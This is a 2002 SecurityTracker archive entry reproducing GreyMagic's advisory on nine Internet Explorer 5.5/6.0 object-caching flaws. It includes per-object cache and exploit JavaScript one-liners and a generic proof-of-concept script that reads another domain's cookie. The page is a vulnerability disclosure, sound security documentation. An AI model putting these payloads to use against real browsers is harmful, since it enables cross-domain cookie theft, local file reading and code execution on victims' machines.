Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Microsoft Internet Explorer Cached Object Flaw Lets Remote Users Execute Arbitrary Programs on the Target User's Computer
|
|
SecurityTracker Alert ID: 1005466 |
|
SecurityTracker URL: http://securitytracker.com/id/1005466
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Oct 23 2002
|
Original Entry Date: Oct 23 2002
|
Impact:
Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 5.5, 6.0
|
Description:
Several object caching vulnerabilities were reported in Microsoft's Internet Explorer browser. A remote user may be able to execute arbitrary code in the Local Computer zone and obtain full access to a target user's computer.
GreyMagic Software reported that a remote user can cause a target user to open a window in the remote user's domain, then change the window to another page (in the target user's local computer zone, for example) while keeping the previous cached object references in place. Then, the cached object references can be used by the remote user to gain access to the new page's Document Object Model. This allows the remote user to read cookies from any domain, forge content in any URL, read local files, and execute arbitrary programs on the target user's computer.
Several objects are vulnerable, each in a slightly different manner and with differing impacts. For full details of the required exploit method and potential impact associated with each vulnerable object, see the Source Message or the GreyMagic advisory at:
http://security.greymagic.com/adv/gm012-ie/
The vulnerable objects are:
1. showModalDialog
2. external
3. createRange
4. elementFromPoint
5. getElementById
6. getElementsByName
7. getElementsByTagName
8. execCommand
9. clipboardData
The original advisory (in the Source Message) reported that IE5 SP2 and IE6 SP1 are not vulnerable. However, GreyMagic has updated the advisory on their web site to indicate that they are indeed vulnerable to at least some of the methods.
A demonstration exploit is provided in the Source Message.exploitcode
<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
location.href="http://google.com";
setTimeout(
function () {
[Exploit line(s) here]
},
3000
);
</script>
|
Impact:
A remote user can read cookies from any security domain, forge content in any URL, read local files, and execute arbitrary programs on the target user's computer.
|
Solution:
No solution was available at the time of this entry.
The author of the report suggests disabling Active Scripting until a patch is available.
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause:
Access control error, State error
|
Underlying OS:
Windows (Any)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 22 Oct 2002 17:24:00 +0200
Subject: Vulnerable cached objects in IE (9 advisories in 1)
|
GreyMagic Security Advisory GM#012-IE
=====================================
By GreyMagic Software, Israel.
22 Oct 2002.
Available in HTML format at http://security.greymagic.com/adv/gm012-ie/.
Topic: Vulnerable cached objects in IE (9 advisories in 1).
Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002.
Affected applications:
======================
Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not
vulnerable.
Note that any other application that uses Internet Explorer's engine
(WebBrowser control) is affected as well (AOL Browser, MSN Explorer, etc.).
Introduction:
=============
When communicating between windows, security checks ensure that both pages
are in the same security zone and on the same domain. These crucial security
checks wrongly assume that certain methods and objects are only going to be
called through their respective window. This assumption enables some cached
methods and objects to provide interoperability between otherwise separated
documents.
Many security issues arise from storing references to objects that are
supposed to be inaccessible when the page unloads. PivX lately disclosed
such an issue in the <object> element, which left a valid reference in its
"object" property.
Discussion:
===========
Through exhaustive research, we discovered nine vulnerabilities in Internet
Explorer involving object caching, most of them highly critical. We're
grouping all of these vulnerabilities into this advisory in order to avoid a
flood and repetitive statements.
Object caching takes place when the attacker opens a window to a page in his
own site. The URL in the window is then changed to the victim page, but the
cached references stay in place, providing direct access to the new
document.
All nine vulnerabilities are of the same general class (object caching).
However, each of them is a separate vulnerability, which uses a unique
method for exploitation.
Each item in the list below consists of three parts, "Cache" shows how to
cache the vulnerable object, "Exploit" shows how the vulnerability works in
context and "Impact" details the implications of the vulnerability.
"Full access" means access to any page's Document Object Model in any domain
and any zone. The implications include (but not limited to) reading cookies
from any domain, forging content in any URL, reading local files and
executing arbitrary programs.
1. showModalDialog
Cache: var fVuln=oWin.showModalDialog;
Exploit - IE 5.5:
fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"
vulnerability.
Impact: Full access in IE5.5, "My Computer" zone access in IE6.
2. external
Cache: var oVuln=oWin.external;
Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
Impact: Full access.
3. createRange
Cache: var fVuln=oWin.document.selection.createRange;
Exploit: fVuln().pasteHTML("<img
src=\"javascript:alert(document.cookie)\">");
Impact: Full access.
4. elementFromPoint
Cache: var fVuln=oWin.document.elementFromPoint;
Exploit: alert(fVuln(1,1).document.cookie);
Impact: Full access.
5. getElementById
Cache: var fVuln=oWin.document.getElementById;
Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);
Impact: Full access.
6. getElementsByName
Cache: var fVuln=oWin.document.getElementsByName;
Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
Impact: Full access.
7. getElementsByTagName
Cache: var fVuln=oWin.document.getElementsByTagName;
Exploit: alert(fVuln("BODY")[0].document.cookie);
Impact: Full access.
8. execCommand
Cache: var fVuln=oWin.document.execCommand;
Exploit: fVuln("SelectAll"); fVuln("Copy");
alert(clipboardData.getData("text"));
Impact: Read access to the loaded document.
9. clipboardData
Cache: var oVuln=oWin.clipboardData;
Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");
Impact: Read/write access to the clipboard, regardless of settings.
IE 5 SP2 and IE6 SP1 are not vulnerable.
Exploit:
========
This generic exploit demonstrates how an attacker may read the client's
"google.com" cookie using one of the cached objects above.
<script language="jscript">
var oWin=open("blank.html","victim","width=100,height=100");
[Cache line here]
location.href="http://google.com";
setTimeout(
function () {
[Exploit line(s) here]
},
3000
);
</script>
Solution:
=========
Until a patch becomes available either disable Active Scripting or upgrade
to IE6 SP1.
Tested on:
==========
IE5.5 Win98.
IE5.5 NT4.
IE6 Win98.
IE6 Win2000.
IE6 WinXP.
Demonstration:
==============
We put together a single nine-in-one proof of concept demonstration, which
can be found at http://security.greymagic.com/adv/gm012-ie/.
Feedback:
=========
Please mail any questions or comments to security@greymagic.com.
- Copyright © 2002 GreyMagic Software.
|
|
Go to the Top of This SecurityTracker Archive Page
|
